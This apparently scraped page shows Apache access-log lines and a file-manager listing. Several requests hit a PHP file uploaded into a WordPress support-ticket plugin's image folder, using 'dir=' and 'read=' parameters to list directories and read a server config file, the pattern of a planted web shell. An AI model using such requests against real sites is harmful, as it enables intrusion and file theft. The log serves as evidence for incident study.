44.215.61.66 - - [25/Apr/2025:09:28:29 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html&read=/home/diavoloapp/public_html/.user.ini HTTP/1.1" 200 62064 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.0.63.151 - - [25/Apr/2025:09:28:32 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins/revslider HTTP/1.1" 200 24804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
23.23.104.107 - - [25/Apr/2025:09:28:36 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins/learnpress-wishlist HTTP/1.1" 200 16786 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
113.141.91.58 - - [25/Apr/2025:09:32:11 -0600] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"

Filemanager

Name Type Size Permission Actions
diavoloapp.com File 25.43 KB 0640
diavoloapp.com-ssl_log File 1.5 MB 0640